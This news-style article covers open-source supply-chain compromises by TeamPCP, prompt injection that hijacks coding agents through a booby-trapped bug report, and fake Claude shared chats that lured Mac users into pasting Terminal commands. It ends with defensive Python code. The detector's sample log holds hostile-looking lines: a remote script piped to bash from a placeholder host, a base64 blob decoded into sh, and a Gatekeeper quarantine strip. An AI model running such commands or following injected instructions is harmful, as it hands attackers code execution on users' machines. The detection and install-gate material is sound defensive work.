Trust is the objective: supply-chain attacks in the era of AI.
Hackers are no longer simply breaking in; they are walking through the doors left open for them. This past week made it clear that the things developers rely on most, open-source code and AI tools, have become the easiest targets.
1,000 Compromised Packages
The first example involves a group called TeamPCP. In less than four months it has inserted malicious code into more than 1,000 open-source software packages, as reported by CyberScoop. The operation began with a single tool in February and has kept up a rapid pace since. The technique is not sophisticated, and that is precisely the point: many organizations pull in dependencies automatically and rarely verify what they install, and TeamPCP exploits that trust. Together, the compromised packages account for around 500 million downloads each week. Identified victims include prominent names such as Bitwarden, Red Hat, SAP, PyTorch Lightning, and even GitHub. The group does not appear to be primarily financially motivated; researchers suggest its aim is chaos and notoriety, and it has collected only about $90,000 through extortion. One security firm now estimates roughly a 1-in-10 chance that any given package an organization installs could trigger an ongoing attack.
AI Intensifies the Problem
AI makes the problem worse. Developers used to scrutinize their dependencies more closely than they do now; today coding agents install packages on their own, often with no human in the loop. “In some scenarios, there’s nearly no human involvement,” Socket's Feross Aboukhadijeh told CyberScoop. The agents themselves are also targets. Researchers have shown that a booby-trapped bug report can hijack an AI coding assistant into running attacker-supplied commands, a form of prompt injection: the agent reads the report as instructions rather than data. Self-replicating worms are already spreading through code repositories, and a compromised editor extension has let attackers steal numerous GitHub repositories.
Even Claude Became a Tool for Attacks
The second campaign is more subtle. Hackers turned Anthropic’s Claude against its own users by abusing “Shared Chats,” a feature that publishes a public link to a past conversation. The attackers created fake “Apple Support” chats on claude.ai that instructed macOS developers to paste a command into Terminal, and they bought Google ads for searches such as “Claude Code on Mac” to drive victims to those conversations. Because the links lived on Claude’s own trusted domain, they appeared safe. Trend Micro reported more than 2,000 victims, mainly in the Asia-Pacific region. Anthropic has since banned the accounts involved and disabled the related conversations.
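The lure above ends with the victim pasting a command into Terminal, so the last place to catch it is process telemetry on the Mac itself. The detector below is an added example for this article, not Trend Micro's or Anthropic's tooling: the event format (a "parent -> command line" pair per line), the parent-process names and the sample log lines are constructed, and the three patterns are generic "paste this into your terminal" heuristics (remote script piped into a shell, base64 blob decoded into a shell, Gatekeeper quarantine attribute stripped), not the specific command used in the campaign, which the article does not give.

```python
"""Flag ClickFix-style 'paste this into Terminal' execution on macOS.

Added example for this article, not Trend Micro's or Anthropic's tooling.
The event format ("parent -> command line") and the sample lines are
constructed; the patterns are generic heuristics, not the specific command
used in the campaign, which the article does not give.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Event:
    parent: str   # parent process name (hypothetical EDR field)
    cmdline: str  # full command line of the spawned process


# A command pasted by the victim is spawned by an interactive terminal app.
INTERACTIVE_PARENTS = {"Terminal", "iTerm2"}

# Each rule is (name, regex over the command line).
RULES = [
    # curl/wget output piped straight into a shell: remote code, never on disk.
    ("remote_fetch_piped_to_shell",
     re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(ba|z)?sh\b")),
    # base64 blob decoded and piped into a shell: obfuscated one-liner.
    ("base64_decode_piped_to_shell",
     re.compile(r"\bbase64\s+(-d|-D|--decode)\b[^|]*\|\s*(sudo\s+)?(ba|z)?sh\b")),
    # Stripping the quarantine attribute defeats Gatekeeper for a dropped binary.
    ("quarantine_bypass",
     re.compile(r"\bxattr\s+-\w*d\w*\s+com\.apple\.quarantine\b")),
]


def parse_log(text: str) -> list[Event]:
    """Parse 'parent -> cmdline' lines into Events, skipping blank lines."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        parent, _, cmdline = line.partition(" -> ")
        events.append(Event(parent.strip(), cmdline.strip()))
    return events


def detect(events: list[Event]) -> list[tuple[str, str, str]]:
    """Return (rule, parent, cmdline) for every rule an interactive-shell event trips."""
    hits = []
    for ev in events:
        if ev.parent not in INTERACTIVE_PARENTS:
            continue  # scoped to user-pasted commands; other parents need other rules
        for name, pattern in RULES:
            if pattern.search(ev.cmdline):
                hits.append((name, ev.parent, ev.cmdline))
    return hits


# Constructed sample events, not real telemetry. example.invalid is a reserved name.
SAMPLE_LOG = """\
Terminal -> /bin/zsh -c 'curl -fsSL https://example.invalid/support.sh | bash'
Terminal -> /bin/zsh -c 'echo ZWNobyBwd25lZA== | base64 -D | sh'
Terminal -> xattr -d com.apple.quarantine /tmp/helper
Terminal -> git status
Xcode -> /usr/bin/swift build
"""

if __name__ == "__main__":
    for rule, parent, cmd in detect(parse_log(SAMPLE_LOG)):
        print(f"[{rule}] {parent}: {cmd}")
```

Scoping the rules to interactive terminal parents keeps build systems and package managers from tripping them; a `curl | sh` spawned by `launchd` is a persistence signal and belongs in a separate rule with its own severity.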
Why This Matters
What these incidents share is trust. Attackers no longer need sophisticated exploits; they need only to subvert something you already trust: a package registry, a coding agent, or a familiar domain. As one industry bulletin noted, “legitimate” does not mean “safe.” For the industry this is a jarring reset. It demands scrutiny of the tools people rely on, not just the files they download. Concretely, a package install is code execution (install hooks run with the installing user's privileges, and the installed code runs inside the application), so it should be pinned, hash-checked and reviewed like any other code; and an AI agent that installs and runs software is a user account, and should get its own credentials, least privilege and audit trail. The web did not fail this week; it was used exactly as designed, which may prove the harder problem to fix.
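The two rules above, treat an install as code execution and treat an agent as a user account, can be enforced at one choke point: a gate that every install request, from a developer or from a coding agent, has to pass. The class below is an added example for this article and not the page's, TeamPCP's or any vendor's tool; it also serves the earlier point about agents installing packages with no human in the loop. The lockfile shape (package name to pinned version and SHA-256 of the reviewed archive), the principal kinds "human" and "agent", the package names and the archive bytes are all constructed for illustration.

```python
"""Pre-install gate: a package install is treated as code execution, and every
requester, human or coding agent, is a principal with its own permissions.

Added example for this article, not the page's or any vendor's tool. The
lockfile shape (name -> pinned version, sha256 of the reviewed archive), the
principal kinds "human"/"agent" and the archive bytes are all constructed.
"""
import hashlib
from dataclasses import dataclass


@dataclass(frozen=True)
class Principal:
    name: str
    kind: str  # "human" or "agent" (hypothetical labels)


@dataclass(frozen=True)
class Artifact:
    name: str
    version: str
    data: bytes                # the downloaded archive (tarball, wheel, ...)
    install_hooks: tuple = ()  # install-time scripts it declares (postinstall, setup.py, ...)


@dataclass(frozen=True)
class Decision:
    allowed: bool
    reason: str


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


# Constructed archives standing in for real package files.
GOOD_ARCHIVE = b"left-pad-1.0.0 constructed archive bytes"
TAMPERED_ARCHIVE = GOOD_ARCHIVE + b" + injected credential stealer"

# Lockfile as reviewed and committed by a human: name -> (version, sha256).
LOCKFILE = {"left-pad": ("1.0.0", sha256_hex(GOOD_ARCHIVE))}


class InstallGate:
    def __init__(self, lockfile: dict, hook_allowlist=()):
        self.lockfile = dict(lockfile)
        self.hook_allowlist = set(hook_allowlist)  # packages whose install hooks were reviewed
        self.audit = []                            # (principal, package, version, allowed, reason)

    def pin(self, who: Principal, art: Artifact) -> Decision:
        """Only a human reviewer may add or change a pin; an agent cannot widen its own allowlist."""
        if who.kind != "human":
            d = Decision(False, "only a human reviewer may pin a new package")
        else:
            self.lockfile[art.name] = (art.version, sha256_hex(art.data))
            d = Decision(True, f"pinned {art.name}=={art.version}")
        self.audit.append((who.name, art.name, art.version, d.allowed, d.reason))
        return d

    def request_install(self, who: Principal, art: Artifact) -> Decision:
        """Evaluate an install request; every decision is attributed to the requesting principal."""
        d = self._evaluate(art)
        self.audit.append((who.name, art.name, art.version, d.allowed, d.reason))
        return d

    def _evaluate(self, art: Artifact) -> Decision:
        pinned = self.lockfile.get(art.name)
        if pinned is None:
            return Decision(False, f"{art.name} is not in the lockfile; review and pin it first")
        version, digest = pinned
        if art.version != version:
            return Decision(False, f"{art.name} {art.version} requested but {version} is pinned")
        # Compare the bytes actually fetched, not just the version string the registry reports.
        if sha256_hex(art.data) != digest:
            return Decision(False, f"{art.name} archive hash mismatch: not the reviewed build")
        # Install hooks run arbitrary code with the installer's privileges; default-deny.
        if art.install_hooks and art.name not in self.hook_allowlist:
            return Decision(False, f"{art.name} would run install-time code: {', '.join(art.install_hooks)}")
        return Decision(True, f"{art.name}=={art.version} pinned, hash verified, no unreviewed hooks")


if __name__ == "__main__":
    gate = InstallGate(LOCKFILE)
    agent = Principal("ci-coding-agent", "agent")
    print(gate.request_install(agent, Artifact("left-pad", "1.0.0", GOOD_ARCHIVE)))
    print(gate.request_install(agent, Artifact("left-pad", "1.0.0", TAMPERED_ARCHIVE)))
```

The hash check is what defeats a registry-side compromise of an already-pinned version: the version string still matches, but the bytes do not. The `pin` permission is the "agent as user account" half: the agent can install what a human has already reviewed, but cannot add a new dependency to the lockfile on its own, and every request lands in the audit log under the agent's own name.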
